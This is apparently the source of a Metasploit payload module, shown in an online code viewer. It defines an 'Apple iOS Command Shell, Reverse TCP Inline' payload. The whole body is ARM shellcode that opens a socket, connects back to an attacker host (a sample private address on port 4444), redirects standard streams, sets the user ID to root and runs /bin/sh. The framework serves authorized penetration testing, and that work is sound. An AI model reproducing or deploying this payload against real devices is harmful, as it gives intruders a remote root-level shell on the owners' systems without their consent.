Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = 152
10

11
  include Msf::Payload::Single
12
  include Msf::Payload::Osx
13
  include Msf::Sessions::CommandShellOptions
14

15
  def initialize(info = {})
16
    super(merge_info(info,
17
      'Name'          => 'Apple iOS Command Shell, Reverse TCP Inline',
18
      'Description'   => 'Connect back to attacker and spawn a command shell',
19
      'Author'        => 'hdm',
20
      'License'       => MSF_LICENSE,
21
      'Platform'      => 'osx',
22
      'Arch'          => ARCH_ARMLE,
23
      'Handler'       => Msf::Handler::ReverseTcp,
24
      'Session'       => Msf::Sessions::CommandShellUnix,
25
      'Payload'       =>
26
        {
27
          'Offsets' =>
28
            {
29
              'LPORT'    => [ 30, 'n'    ],
30
              'LHOST'    => [ 32, 'ADDR' ],
31
            },
32
          'Payload' =>
33
            [
34
              # socket
35
              0xe3a00002, # mov r0, #0x2
36
              0xe3a01001, # mov r1, #0x1
37
              0xe3a02006, # mov r2, #0x6
38
              0xe3a0c061, # mov r12, #0x61
39
              0xef000080, # swi 128
40
              0xe1a0a000, # mov r10, r0
41
              0xeb000001, # bl _konnect
42

43
              # port 4444
44
              0x5c110200,
45

46
              # host 192.168.0.135
47
              0x8700a8c0,
48

49
              # connect
50
              0xe1a0000a, # mov r0, r10
51
              0xe1a0100e, # mov r1, lr
52
              0xe3a02010, # mov r2, #0x10
53
              0xe3a0c062, # mov r12, #0x62
54
              0xef000080, # swi 128
55

56
              # setup dup2
57
              0xe3a05002, # mov r5, #0x2
58

59
              # dup2
60
              0xe3a0c05a, # mov r12, #0x5a
61
              0xe1a0000a, # mov r0, r10
62
              0xe1a01005, # mov r1, r5
63
              0xef000080, # swi 128
64
              0xe2455001, # sub r5, r5, #0x1
65
              0xe3550000, # cmp r5, #0x0
66
              0xaafffff8, # bge _dup2
67

68
              # setreuid(0,0)
69
              0xe3a00000, # mov r0, #0x0
70
              0xe3a01000, # mov r1, #0x0
71
              0xe3a0c07e, # mov r12, #0x7e
72
              0xef000080, # swi 128
73

74
              # execve
75
              0xe0455005, # sub r5, r5, r5
76
              0xe1a0600d, # mov r6, sp
77
              0xe24dd020, # sub sp, sp, #0x20
78
              0xe28f0014, # add r0, pc, #0x14
79
              0xe4860000, # str r0, [r6], #0
80
              0xe5865004, # str r5, [r6, #4]
81
              0xe1a01006, # mov r1, r6
82
              0xe3a02000, # mov r2, #0x0
83
              0xe3a0c03b, # mov r12, #0x3b
84
              0xef000080, # swi 128
85

86
              # /bin/sh
87
              0x6e69622f,
88
              0x0068732f
89
            ].pack("V*")
90
        }
91
      ))
92
  end
93
end
94

95